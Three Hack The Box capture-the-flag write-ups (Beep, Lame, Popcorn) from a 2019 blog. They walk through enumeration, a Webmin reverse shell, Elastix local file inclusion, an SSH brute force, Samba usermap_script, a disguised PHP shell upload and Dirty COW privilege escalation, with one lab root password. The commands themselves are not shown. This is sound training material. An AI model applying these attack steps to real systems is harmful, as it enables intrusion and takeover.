AdSense

Wednesday, January 9, 2019

Beep


BEEP


- Layout for this exercise:





1 - INTRODUCTION


- The goal for this exercise is to develop a hacking process for the vulnerable machine Beep, what is a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu/


2 - ENUMERATION

Beep's IP is 10.10.10.7:




- Scanning with Nmap:




- When connecting to the web server at port 80 HTTP there is a redirection to port 443 HTTPS, where an Elastix application is running:




- Dirbusting the web server with wordlist big.txt:




- Trying to use Elastix basic credentials like admin:admin, admin:password, etc ... an Authentication Required form is prompted to the user when connecting to folder /admin:





- Also, from folder /admin we learn that Beep runs FreePBX 2.8.1.4: 





- Going to folder /vtigercrm we learn that Beep runs vtiger CRM 5:





- Checking port 10000, where webamin is running:









- The authentication form reveals session_login.cgi:








3 - EXPLOITATION


- Let's use two ways to exploit the vulnerable machine Beep:

3.1 - WEBMIN

- We can try to get a reverse shell by using this bash script:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet





- Setting a Netcat  listener at port 1234:




- curl helps to execute remotely the bash script, using options -k (for insecure connections) and -H (extra header):




- As a result, a successful remote reverse root shell is achieved:





3.2 - ELASTIX LOCAL FILE INCLUSION

- Elastix 2.2.0 is vulnerable to several exploits, for instance this one:




- Reading the instructions, it seems that graph.php?current_language allows a Local File Inclusion:





- Following the instructions:




- Viewing the source, the file is now readable:





- There are some interesting lines what must be noticed, for instance:









- Also, we can use the LFI to get /etc/passwd:




- Unfortunately access to /etc/shadow is restricted:




- In the same way let's have a look to /etc/asterisk/manager.conf:




- Now, it's time to bruteforce the SSH service.


- Let's create one file for users (picking up the most relevants from previous lists) and another one for passwords:




- Medusa does the work for us:





- Finally, it is easy to get a remote root shell just connecting with SSH by using credentials root:jEhdIekWmdjE







4 - CAPTURING THE FLAGS

- Reading the 1st flag user.txt:




- Decrypting the 1st flag:





- Reading the 2nd flag root.txt:




- Decrypting the 2nd flag:














Friday, January 4, 2019

Lame


LAME

- Layout for this exercise:




1 - INTRODUCTION

- The goal for this exercise is to develop a hacking process for the vulnerable machine Lame, what is a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu/






2 - ENUMERATION

- Lame's IP is 10.10.10.3:




- Scanning with Nmap:





3 - EXPLOITATION

- The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the SamrChangePassword function, when the username map script smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the remote printer and file share management.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2447


- Metasploit exploit /exploit/multi/samba/usermap_script allows to take advantage ot that vulnerability:






4 - EXPLOITATION

- Metasploit provides a straightforward exploitation by getting a remote root shell:






- Improving the shell:





5 - CAPTURING THE FLAG

- There are two flags to be discovered.

- First, reading user.txt:




- Decrypting the MD5 string:





- Second, reading root.txt:




- Decrypting the MD5 string:









Thursday, January 3, 2019

Popcorn


POPCORN

- Layout for this exercise:




1 - INTRODUCTION

- The goal for this exercise is to develop a hacking process for the vulnerable machine Popcorn, what is a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu/




2 - ENUMERATION

- Popcorn's IP is 10.10.10.6:



- Scanning with Nmap:





- Connecting with the browser:




- Dirbusting the web server:




- There is an interesting directory torrent what holds a Torrent Hoster application:





- The Upload tab might be promising:




- A login form is presented to the user:





- Creating a new user whitelist:whitelist with Sign Up:









- Login as whitelist:





- Clicking Upload to upload torrent files:





- Downloading Kali's torrent file from the original repository:





 


- Uploading Kali's torrent to Popcorn:







- Changing category to Other/Other (otherwise the upload doesn't work):





- The upload is successful:







- Clicking the filename, it seems that the Screenshot can be edited by uploading new images with extensions like jpg, jpeg, gif, png:







3 - EXPLOITATION

- The exploitation attack consists on uploading an exploit to Popcorn's web server, running it and then getting a reverse shell connection.


- Creating an exploit with Msfvenom and saving it as exploit.php:







- However exploit.php will be probably filtered because it does not have an image extension:







- Let's intercept the submission with Burp:




- Submitting exploit.php:




- Let's focus in this line:



- Changing to:




- Forwarding:




- The submission is successful:




- Now, where has exploit.php been uploaded?

- Dirbusting the folder /torrent we find a directory called upload:







- Connecting to /upload we locate exploit.php:






- Now, setting a Meterpreter listening session:




- To run exploit.php just click it:




- The Meterpreter session is achieved:




 - Reading information about the system:







- Getting a remote shell:




- Improving the shell with:





- Going to /home and listing content:




- Going to user george's folder:




- Reading user's flag:





4 - PRIVILEGE ESCALATION

- Let's exploit the kernel in two ways:

4.1 - Dirtycow

- The kernel 2.6.31 is vulnerable to the exploit dirtycow.c:




- Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel, a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem.


https://en.wikipedia.org/wiki/Dirty_COW





- According to the instructions of dirty.c it creates a new user called firefart with a password provided by the attacker.

- Copying the exploit and storing locally at Kali:







- Transferring dirty.c to Popcorn:




- Compiling dirty.c by following the instructions:







- Running dirty and entering the new password hola:




- Switching to the user firefart:hola we get a remote root shell:





4.2 - Full-Nelson.c Local Privilege Escalation

- Also, the kernel 2.6.31 is vulnerable to the exploit 15704.c:





- Downloading 15704.c to Kali:





- Transferring 15704.c from Kali to Popcorn /tmp folder:







- Compiling 15704.c according to the instructions:







- Running the exploit a root shell is  achieved:





5 - CAPTURING THE FLAG

- Reading root.txt: